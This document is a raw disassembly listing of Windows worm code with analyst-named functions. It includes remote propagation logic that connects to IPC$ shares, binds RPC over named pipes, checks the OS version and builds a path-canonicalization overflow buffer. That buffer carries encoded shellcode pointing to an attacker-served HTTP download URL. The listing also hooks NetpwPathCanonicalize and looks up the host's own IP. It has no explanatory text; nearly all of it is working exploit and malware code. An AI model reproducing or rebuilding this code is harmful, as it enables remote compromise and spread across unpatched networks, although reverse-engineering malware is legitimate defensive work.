mov al, [ecx+esi]
cmp al, bl
jz short loc_9AA4D7
cmp ecx, 0Fh
jnb short loc_9AA4D7
cmp al, 30h
jl short loc_9AA55B
cmp al, 39h
jg short loc_9AA55B
mov [ebp+cp], bl
xor edx, edx
loc_9AA51C: ; CODE XREF: sub_9AA463+D9�j
mov [ebp+var_28], edx
cmp edx, 0Fh
jnb short loc_9AA53E
mov al, [ecx+esi]
cmp al, 30h
jl short loc_9AA52F
cmp al, 39h
jle short loc_9AA533
loc_9AA52F: ; CODE XREF: sub_9AA463+C6�j
cmp al, 2Eh
jnz short loc_9AA53E
loc_9AA533: ; CODE XREF: sub_9AA463+CA�j
mov [ebp+edx+cp], al
inc ecx
mov [ebp+var_1C], ecx
inc edx
jmp short loc_9AA51C
; ---------------------------------------------------------------------------
loc_9AA53E: ; CODE XREF: sub_9AA463+BF�j
; sub_9AA463+CE�j
mov [ebp+edx+cp], bl
lea eax, [ebp+cp]
push eax ; cp
call inet_addr
mov [ebp+var_20], eax
cmp eax, ebx
jnz short loc_9AA4D7
or [ebp+var_20], 0FFFFFFFFh
jmp loc_9AA4D7
; ---------------------------------------------------------------------------
loc_9AA55B: ; CODE XREF: sub_9AA463+AE�j
; sub_9AA463+B2�j
inc ecx
jmp short loc_9AA500
; ---------------------------------------------------------------------------
loc_9AA55E: ; DATA XREF: .text:stru_9A3F70�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA562: ; DATA XREF: .text:stru_9A3F70�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA565: ; CODE XREF: sub_9AA463+49�j
; sub_9AA463+78�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9AA463 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_download_and_check_my_IP proc near ; CODE XREF: sub_outbound_propagation+250�p
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
dwFlags = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset stru_9A3F80
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+var_3C], ebx
xor eax, eax
lea edi, [ebp+var_38]
stosd
stosd
stosd
mov [ebp+ms_exc.disabled], ebx
push ebx ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call ds:InternetGetConnectedState
test eax, eax
jz short loc_9AA615
mov [ebp+var_20], ebx
loc_9AA5A4: ; CODE XREF: sub_download_and_check_my_IP+51�j
; sub_download_and_check_my_IP+9A�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_9AA615
cmp [ebp+var_20], 4
jnb short loc_9AA615
call ds:rand
and eax, 3
mov [ebp+dwFlags], eax
shl eax, 2
cmp [ebp+eax+var_3C], ebx
jnz short loc_9AA5A4
push ebx ; int
lea ecx, [ebp+var_28]
push ecx ; int
push off_9BA4E8[eax] ; lpszUrl
call sub_download_file_from_URL
add esp, 0Ch
mov esi, eax
mov [ebp+var_2C], esi
cmp esi, ebx
jz short loc_9AA5FE
mov ecx, [ebp+var_28]
cmp ecx, 7
jb short loc_9AA5F3
mov edx, esi
call sub_9AA463
mov [ebp+var_1C], eax
loc_9AA5F3: ; CODE XREF: sub_download_and_check_my_IP+75�j
cmp esi, ebx
jz short loc_9AA5FE
push esi ; hMem
call ds:GlobalFree
loc_9AA5FE: ; CODE XREF: sub_download_and_check_my_IP+6D�j
; sub_download_and_check_my_IP+83�j
mov eax, [ebp+dwFlags]
mov [ebp+eax*4+var_3C], 1
inc [ebp+var_20]
jmp short loc_9AA5A4
; ---------------------------------------------------------------------------
loc_9AA60E: ; DATA XREF: .text:stru_9A3F80�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA612: ; DATA XREF: .text:stru_9A3F80�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA615: ; CODE XREF: sub_download_and_check_my_IP+2D�j
; sub_download_and_check_my_IP+36�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_download_and_check_my_IP endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_9AA62A(size_t Size)
sub_9AA62A proc near ; DATA XREF: .text:pStubDescriptor�o
Size = dword ptr 4
push [esp+Size] ; Size
call ds:malloc
pop ecx
retn 4
sub_9AA62A endp
; ---------------------------------------------------------------------------
loc_9AA638: ; DATA XREF: .text:pStubDescriptor�o
push dword ptr [esp+4]
call ds:free
pop ecx
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA646 proc near ; CODE XREF: sub_9AD6D4+3D�p
; sub_9AD8BC+51�p
Src = byte ptr -80h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 80h
mov eax, [ebp+arg_8]
push esi
push offset dword_9BB2D0
push [ebp+arg_C]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_8+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+Src]
push 80h ; Count
push eax ; Dest
call ds:_snprintf
lea eax, [ebp+Src]
push eax ; Str
mov [ebp+var_1], 0
call strlen
add esp, 28h
add eax, 0BEh
push eax ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
test eax, eax
mov esi, [ebp+arg_0]
mov [esi], eax
jz loc_9AA733
push ebx
push edi
mov edi, 0B9h
push edi ; Size
push offset loc_9BA9F0 ; Src
push eax ; Dst
call memcpy
lea eax, [ebp+Src]
push eax ; Str
call strlen
inc eax
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
mov eax, [esi]
add eax, edi
push eax ; Dst
call memcpy
push 15h
lea eax, [ebp+Src]
pop edi
push eax ; Str
call strlen
mov ebx, 0BAh
add eax, ebx
add esp, 20h
cmp eax, edi
jbe short loc_9AA70D
loc_9AA6F5: ; CODE XREF: sub_9AA646+C5�j
mov eax, [esi]
add eax, edi
xor byte ptr [eax], 0C4h
lea eax, [ebp+Src]
push eax ; Str
inc edi
call strlen
add eax, ebx
cmp edi, eax
pop ecx
jb short loc_9AA6F5
loc_9AA70D: ; CODE XREF: sub_9AA646+AD�j
mov eax, [esi]
mov byte ptr [edi+eax], 4Dh
mov eax, [esi]
mov byte ptr [eax+edi+1], 53h
mov eax, [esi]
mov byte ptr [eax+edi+2], 0
push dword ptr [esi] ; Str
call strlen
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
pop edi
inc eax
pop ebx
loc_9AA733: ; CODE XREF: sub_9AA646+63�j
pop esi
leave
retn
sub_9AA646 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA736 proc near ; CODE XREF: sub_9AABAE+83�p
Dest = byte ptr -120h
var_21 = byte ptr -21h
Dst = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aSIpc_0 ; "\\\\%s\\IPC$"
push 100h ; Count
push eax ; Dest
call ds:_snprintf
push 20h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
mov [ebp+var_21], 0
call memset
add esp, 1Ch
mov eax, offset WindowName ; "recv"
push 0 ; dwFlags
push eax ; lpUserName
push eax ; lpPassword
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
lea ecx, [ebp+Dest]
push eax ; lpNetResource
mov [ebp+var_14], 3
mov [ebp+var_C], ecx
call WNetAddConnection2A
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9AA736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA799(RPC_CSTR NetworkAddr,RPC_CSTR Endpoint)
sub_9AA799 proc near ; CODE XREF: sub_9AABAE+9E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
StringBinding = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
NetworkAddr = dword ptr 8
Endpoint = dword ptr 0Ch
push 14h
push offset stru_9A3FE0
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+StringBinding], esi
lea eax, [ebp+StringBinding]
push eax ; StringBinding
push esi ; Options
push [ebp+Endpoint] ; Endpoint
push [ebp+NetworkAddr] ; NetworkAddr
push offset ProtSeq ; "ncacn_np"
push esi ; ObjUuid
call ds:RpcStringBindingComposeA
test eax, eax
jnz short loc_9AA7DA
push offset Binding ; Binding
push [ebp+StringBinding] ; StringBinding
call ds:RpcBindingFromStringBindingA
cmp eax, esi
jz short loc_9AA7DE
loc_9AA7DA: ; CODE XREF: sub_9AA799+2D�j
xor eax, eax
jmp short loc_9AA827
; ---------------------------------------------------------------------------
loc_9AA7DE: ; CODE XREF: sub_9AA799+3F�j
mov [ebp+ms_exc.disabled], esi
push esi
push 4
push offset aM ; "M"
push offset aS_0 ; "S"
push offset aAaa ; "AAA"
call sub_9AFF93
add esp, 14h
mov [ebp+var_20], 1
jmp short loc_9AA815
; ---------------------------------------------------------------------------
loc_9AA804: ; DATA XREF: .text:stru_9A3FE0�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA812: ; DATA XREF: .text:stru_9A3FE0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA815: ; CODE XREF: sub_9AA799+69�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset Binding ; Binding
call ds:RpcBindingFree
mov eax, [ebp+var_20]
loc_9AA827: ; CODE XREF: sub_9AA799+43�j
call __SEH_epilog
retn
sub_9AA799 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA82D(int,RPC_CSTR NetworkAddr,RPC_CSTR Endpoint)
sub_9AA82D proc near ; CODE XREF: sub_9AA8E9+269�p
Dst = byte ptr -410h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
StringBinding = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
NetworkAddr = dword ptr 0Ch
Endpoint = dword ptr 10h
push 400h
push offset stru_9A4010
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+StringBinding], esi
lea eax, [ebp+StringBinding]
push eax ; StringBinding
push esi ; Options
push [ebp+Endpoint] ; Endpoint
push [ebp+NetworkAddr] ; NetworkAddr
push offset ProtSeq ; "ncacn_np"
push esi ; ObjUuid
call ds:RpcStringBindingComposeA
test eax, eax
jnz short loc_9AA871
push offset Binding ; Binding
push [ebp+StringBinding] ; StringBinding
call ds:RpcBindingFromStringBindingA
cmp eax, esi
jz short loc_9AA875
loc_9AA871: ; CODE XREF: sub_9AA82D+30�j
xor eax, eax
jmp short loc_9AA8E3
; ---------------------------------------------------------------------------
loc_9AA875: ; CODE XREF: sub_9AA82D+42�j
mov [ebp+ms_exc.disabled], esi
push 3E8h ; Size
push esi ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
mov [ebp+var_24], 101h
push esi
lea eax, [ebp+var_24]
push eax
push offset asc_9A4008 ; "\\"
push 31Fh
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
push offset aHhdhh ; "HHDHH"
call sub_9AFF71
add esp, 28h
mov [ebp+var_20], 1
jmp short loc_9AA8D1
; ---------------------------------------------------------------------------
loc_9AA8C0: ; DATA XREF: .text:stru_9A4010�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_28], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA8CE: ; DATA XREF: .text:stru_9A4010�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA8D1: ; CODE XREF: sub_9AA82D+91�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset Binding ; Binding
call ds:RpcBindingFree
mov eax, [ebp+var_20]
loc_9AA8E3: ; CODE XREF: sub_9AA82D+46�j
call __SEH_epilog
retn
sub_9AA82D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA8E9(int,void *Src,size_t Size,int,int)
sub_9AA8E9 proc near ; CODE XREF: sub_9AABAE+125�p
NetworkAddr = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 88h
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aD_D_D_D ; "\\\\%d.%d.%d.%d"
lea eax, [ebp+NetworkAddr]
push 80h ; Count
push eax ; Dest
call ds:_snprintf
add esp, 1Ch
push ebx
push esi
xor edx, edx
xor eax, eax
mov ecx, 4F8h
push edi
loc_9AA930: ; CODE XREF: sub_9AA8E9+63�j
mov esi, [ebp+arg_C]
cmp dword_9BA4F8[eax], esi
jnz short loc_9AA946
mov edi, dword_9BA4FC[eax]
cmp edi, [ebp+arg_10]
jz short loc_9AA992
loc_9AA946: ; CODE XREF: sub_9AA8E9+50�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9AA930
xor edx, edx
xor eax, eax
loc_9AA952: ; CODE XREF: sub_9AA8E9+80�j
cmp dword_9BA4F8[eax], esi
jnz short loc_9AA963
cmp dword_9BA4FC[eax], 9
jz short loc_9AA992
loc_9AA963: ; CODE XREF: sub_9AA8E9+6F�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9AA952
xor ebx, ebx
loc_9AA96D: ; CODE XREF: sub_9AA8E9+B3�j
test ebx, ebx
jz short loc_9AA98B
cmp [ebp+Size], 190h
ja short loc_9AA98B
push 262h ; dwBytes
call sub_9AC741
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9AA99E
loc_9AA98B: ; CODE XREF: sub_9AA8E9+86�j
; sub_9AA8E9+8F�j
xor eax, eax
jmp loc_9AAB64
; ---------------------------------------------------------------------------
loc_9AA992: ; CODE XREF: sub_9AA8E9+5B�j
; sub_9AA8E9+78�j
lea ebx, [edx+edx*2]
lea ebx, ds:9BA4F8h[ebx*8]
jmp short loc_9AA96D
; ---------------------------------------------------------------------------
loc_9AA99E: ; CODE XREF: sub_9AA8E9+A0�j
push 2 ; Size
push offset asc_9A4008 ; "\\"
push edi ; Dst
call memcpy
add esp, 0Ch
lea esi, [edi+2]
mov [ebp+var_4], 1F4h
loc_9AA9B8: ; CODE XREF: sub_9AA8E9+F4�j
call ds:rand
and al, 1
shl al, 5
or al, 41h
mov byte ptr [ebp+arg_0+3], al
call ds:rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, byte ptr [ebp+arg_0+3]
mov [esi], dl
inc esi
dec [ebp+var_4]
jnz short loc_9AA9B8
push [ebp+Size] ; Size
lea eax, [edi+66h]
push [ebp+Src] ; Src
push eax ; Dst
call memcpy
push 0Eh ; Size
lea eax, [edi+1F6h]
push offset a____ ; "\\..\\..\\"
push eax ; Dst
call memcpy
lea eax, [edi+204h]
mov word ptr [eax], 41h
add esp, 18h
inc eax
inc eax
and [ebp+arg_0], 0
mov [ebp+var_8], eax
lea eax, [edi+206h]
mov esi, 206h
mov [ebp+var_4], eax
loc_9AAA26: ; CODE XREF: sub_9AA8E9+15C�j
; sub_9AA8E9+172�j
call ds:rand
cdq
push 19h
pop ecx
idiv ecx
mov ecx, [ebp+var_8]
lea eax, [edx+42h]
mov edx, [ebp+var_4]
cmp ecx, edx
mov [edx], ax
jnb short loc_9AAA4E
loc_9AAA42: ; CODE XREF: sub_9AA8E9+163�j
cmp [ecx], ax
jz short loc_9AAA26
inc ecx
inc ecx
cmp ecx, [ebp+var_4]
jb short loc_9AAA42
loc_9AAA4E: ; CODE XREF: sub_9AA8E9+157�j
inc [ebp+arg_0]
add [ebp+var_4], 2
inc esi
inc esi
cmp [ebp+arg_0], 6
jb short loc_9AAA26
mov dword ptr [esi+edi], 20408h
add esi, 4
cmp [ebp+arg_C], 6
jz loc_9AAB06
cmp [ebp+arg_C], 7
jz loc_9AAB06
mov eax, [ebx+0Ch]
and [ebp+var_8], 0
test eax, eax
jnz short loc_9AAA89
loc_9AAA86: ; CODE XREF: sub_9AA8E9+224�j
mov eax, [ebx+8]
loc_9AAA89: ; CODE XREF: sub_9AA8E9+19B�j
mov [esi+edi], eax
add esi, 4
lea eax, [esi+46h]
cmp esi, eax
mov [ebp+arg_0], esi
jnb short loc_9AAAB9
loc_9AAA99: ; CODE XREF: sub_9AA8E9+1CE�j
call ds:rand
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add dl, 41h
inc [ebp+arg_0]
mov [eax+edi], dl
lea eax, [esi+46h]
cmp [ebp+arg_0], eax
jb short loc_9AAA99
loc_9AAAB9: ; CODE XREF: sub_9AA8E9+1AE�j
add esi, edi
cmp [ebp+var_8], 0
jz short loc_9AAB12
lea eax, [ebx+8]
mov ecx, [eax]
mov [esi], ecx
mov ecx, [eax]
mov [esi+4], ecx
mov ecx, [eax]
mov [esi+8], ecx
mov ecx, [eax]
mov [esi+0Ch], ecx
mov eax, [eax]
mov [esi+10h], eax
mov eax, [ebx+0Ch]
mov [esi+14h], eax
mov eax, [ebx+14h]
mov [esi+18h], eax
mov eax, [ebx+10h]
mov [esi+38h], eax
mov eax, [ebx+10h]
mov [esi+3Ch], eax
mov byte ptr [esi+40h], 0EBh
mov byte ptr [esi+41h], 2
mov byte ptr [esi+44h], 0EBh
mov byte ptr [esi+45h], 58h
jmp short loc_9AAB40
; ---------------------------------------------------------------------------
loc_9AAB06: ; CODE XREF: sub_9AA8E9+182�j
; sub_9AA8E9+18C�j
mov [ebp+var_8], 1
jmp loc_9AAA86
; ---------------------------------------------------------------------------
loc_9AAB12: ; CODE XREF: sub_9AA8E9+1D6�j
mov eax, [ebx+8]
push 8 ; Size
mov [esi+4], eax
lea eax, [esi+32h]
push offset dword_9A402C ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+3Ah], 0EBh
cmp dword ptr [ebx+0Ch], 0
setnz al
lea eax, ds:5Ah[eax*8]
mov [esi+3Bh], al
loc_9AAB40: ; CODE XREF: sub_9AA8E9+21B�j
and word ptr [esi+46h], 0
push offset dword_9A401C ; Endpoint
lea eax, [ebp+NetworkAddr]
push eax ; NetworkAddr
push edi ; int
call sub_9AA82D
push edi ; lpMem
mov esi, eax
call sub_9AC755
add esp, 10h
mov eax, esi
loc_9AAB64: ; CODE XREF: sub_9AA8E9+A4�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AA8E9 endp
; =============== S U B R O U T I N E =======================================
sub_9AAB69 proc near ; CODE XREF: sub_9AABAE+70�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 1BDh ; hostshort
push [esp+4+arg_0] ; int
call sub_9AF52D
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_9AABAB
dec eax
dec eax
jz short loc_9AAB9F
dec eax
jz short loc_9AAB9B
dec eax
jz short loc_9AAB97
dec eax
jz short loc_9AAB93
dec eax
jnz short loc_9AABAB
push 7
loc_9AAB90: ; CODE XREF: sub_9AAB69+2C�j
; sub_9AAB69+30�j ...
pop eax
jmp short loc_9AABA1
; ---------------------------------------------------------------------------
loc_9AAB93: ; CODE XREF: sub_9AAB69+20�j
push 6
jmp short loc_9AAB90
; ---------------------------------------------------------------------------
loc_9AAB97: ; CODE XREF: sub_9AAB69+1D�j
push 5
jmp short loc_9AAB90
; ---------------------------------------------------------------------------
loc_9AAB9B: ; CODE XREF: sub_9AAB69+1A�j
push 2
jmp short loc_9AAB90
; ---------------------------------------------------------------------------
loc_9AAB9F: ; CODE XREF: sub_9AAB69+17�j
xor eax, eax
loc_9AABA1: ; CODE XREF: sub_9AAB69+28�j
mov ecx, [esp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AABAB: ; CODE XREF: sub_9AAB69+13�j
; sub_9AAB69+23�j
xor eax, eax
retn
sub_9AAB69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
; int __cdecl sub_9AABAE(u_long hostlong,void *Src,size_t Size)
sub_9AABAE proc near ; CODE XREF: sub_9A8F12+D�p
; sub_9AD6D4+F2�p ...
Name = byte ptr -188h
VersionInformation= _OSVERSIONINFOA ptr -124h
var_90 = word ptr -90h
NetworkAddr = byte ptr -88h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
hostlong = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 188h
push ebx
mov ebx, [ebp+6Ch+hostlong]
push esi
mov esi, ds:_snprintf
mov eax, ebx
shr eax, 18h
push eax
movzx eax, byte ptr [ebp+6Ch+hostlong+2]
push eax
movzx eax, bh
push eax
mov eax, ebx
and eax, 0FFh
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
lea eax, [ebp+6Ch+NetworkAddr]
push 80h ; Count
push eax ; Dest
call esi ; _snprintf
push ebx ; hostlong
mov [ebp+6Ch+var_9], 0
call sub_9A9DA6
add esp, 20h
test eax, eax
jnz loc_9AAD02
or [ebp+6Ch+var_4], 0FFFFFFFFh
push ebx ; hostlong
call sub_validate_hostlong_and_bsearch
movzx eax, ax
test eax, eax
pop ecx
mov [ebp+6Ch+var_8], eax
jz loc_9AAD02
lea eax, [ebp+6Ch+var_4]
push eax
push ebx
call sub_9AAB69
test eax, eax
pop ecx
pop ecx
jz loc_9AAD02
lea eax, [ebp+6Ch+NetworkAddr]
push eax
call sub_9AA736
pop ecx
push 2
pop ebx
cmp [ebp+6Ch+var_4], ebx
jnz loc_9AACC4
lea eax, [ebp+6Ch+NetworkAddr]
push offset Endpoint ; Endpoint
push eax ; NetworkAddr
call sub_9AA799
test eax, eax
pop ecx
pop ecx
jnz short loc_9AACC4
push edi
push 26h
pop ecx
mov [ebp+6Ch+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+6Ch+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+6Ch+VersionInformation]
push eax ; lpVersionInformation
call ds:GetVersionExA
cmp [ebp+6Ch+VersionInformation.dwMajorVersion], 5
push 6
pop edi
jnz short loc_9AAC9F
cmp [ebp+6Ch+VersionInformation.dwMinorVersion], 1
jnz short loc_9AACAA
cmp [ebp+6Ch+var_90], bx
jbe short loc_9AAC99
push 8
jmp short loc_9AACA9
; ---------------------------------------------------------------------------
loc_9AAC99: ; CODE XREF: sub_9AABAE+E5�j
jnz short loc_9AACAA
mov edi, ebx
jmp short loc_9AACAA
; ---------------------------------------------------------------------------
loc_9AAC9F: ; CODE XREF: sub_9AABAE+D6�j
cmp [ebp+6Ch+VersionInformation.dwMajorVersion], edi
jb short loc_9AACAA
push 7
loc_9AACA9: ; CODE XREF: sub_9AABAE+E9�j
pop edi
loc_9AACAA: ; CODE XREF: sub_9AABAE+DF�j
; sub_9AABAE:loc_9AAC99�j ...
call ds:rand
cdq
push 0Ah
pop ecx
idiv ecx
xor eax, eax
cmp edx, edi
setl al
pop edi
add eax, 3
mov [ebp+6Ch+var_4], eax
loc_9AACC4: ; CODE XREF: sub_9AABAE+8F�j
; sub_9AABAE+A7�j
push [ebp+6Ch+var_8] ; int
push [ebp+6Ch+var_4] ; int
push [ebp+6Ch+Size] ; Size
push [ebp+6Ch+Src] ; Src
push [ebp+6Ch+hostlong] ; int
call sub_9AA8E9
lea eax, [ebp+6Ch+NetworkAddr]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+6Ch+Name]
push 100h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 24h
push 1 ; fForce
push 0 ; dwFlags
lea eax, [ebp+6Ch+Name]
push eax ; lpName
call WNetCancelConnection2A
loc_9AAD02: ; CODE XREF: sub_9AABAE+4C�j
; sub_9AABAE+65�j ...
pop esi
pop ebx
add ebp, 6Ch
leave
retn
sub_9AABAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAD09(wchar_t *Str)
sub_9AAD09 proc near ; CODE XREF: sub_9AAD64+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
Str = dword ptr 8
push 0Ch
push offset stru_9A4070
call __SEH_prolog
mov [ebp+var_1C], 1
xor esi, esi
mov [ebp+ms_exc.disabled], esi
cmp [ebp+Str], esi
jz short loc_9AAD57
push offset a__ ; "\\..\\"
push [ebp+Str] ; Str
call ds:wcsstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AAD4B
push [ebp+Str] ; Str
call ds:wcslen
pop ecx
cmp eax, 0C8h
jbe short loc_9AAD57
loc_9AAD4B: ; CODE XREF: sub_9AAD09+2F�j
mov [ebp+var_1C], esi
jmp short loc_9AAD57
; ---------------------------------------------------------------------------
loc_9AAD50: ; DATA XREF: .text:stru_9A4070�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAD54: ; DATA XREF: .text:stru_9A4070�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAD57: ; CODE XREF: sub_9AAD09+1B�j
; sub_9AAD09+40�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AAD09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AAD64(wchar_t *Str,int,int,int,int,int)
sub_9AAD64 proc near ; DATA XREF: sub_patch_NetpwPathCanonicalize+5�o
Str = dword ptr 8
push ebp
mov ebp, esp
cmp lpAddress, 0
jz short loc_9AAD86
push [ebp+Str] ; Str
call sub_9AAD09
test eax, eax
pop ecx
jnz short loc_9AAD95
push [ebp+Str]
call sub_9A9067
pop ecx
loc_9AAD86: ; CODE XREF: sub_9AAD64+A�j
push 57h ; dwErrCode
call ds:SetLastError
push 57h
pop eax
pop ebp
retn 18h
; ---------------------------------------------------------------------------
loc_9AAD95: ; CODE XREF: sub_9AAD64+17�j
mov eax, lpAddress
add eax, 4
pop ebp
jmp eax
sub_9AAD64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AADA0 proc near ; CODE XREF: sub_9AADCD+3E�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_9A4080
call __SEH_prolog
mov eax, [ebp+arg_0]
and [ebp+ms_exc.disabled], 0
mov cl, [eax]
or cl, 70h
mov [eax], cl
jmp short loc_9AADC3
; ---------------------------------------------------------------------------
loc_9AADBC: ; DATA XREF: .text:stru_9A4080�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AADC0: ; DATA XREF: .text:stru_9A4080�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AADC3: ; CODE XREF: sub_9AADA0+1A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AADA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AADCD proc near ; DATA XREF: sub_9AB49A+5�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, dword_9BB190
test eax, eax
jz short loc_9AAE16
push esi
push [ebp+arg_10]
add eax, 4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
cmp [ebp+arg_4], 22h
mov esi, eax
jnz short loc_9AAE11
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_9AAE11
cmp [ebp+arg_8], 0
jz short loc_9AAE11
cmp [ebp+arg_C], 0
jz short loc_9AAE11
push [ebp+arg_8]
call sub_9AADA0
pop ecx
loc_9AAE11: ; CODE XREF: sub_9AADCD+27�j
; sub_9AADCD+2D�j ...
mov eax, esi
pop esi
jmp short loc_9AAE19
; ---------------------------------------------------------------------------
loc_9AAE16: ; CODE XREF: sub_9AADCD+A�j
push 57h
pop eax
loc_9AAE19: ; CODE XREF: sub_9AADCD+47�j
pop ebp
retn 14h
sub_9AADCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAE1D(char *lpFirst)
sub_9AAE1D proc near ; CODE XREF: sub_9AAE58+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFirst = dword ptr 8
push 0Ch
push offset stru_9A4090
call __SEH_prolog
xor eax, eax
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpFirst], eax
jz short loc_9AAE4B
push [ebp+lpFirst] ; lpFirst
call sub_9A9D29
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AAE4B
; ---------------------------------------------------------------------------
loc_9AAE44: ; DATA XREF: .text:stru_9A4090�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
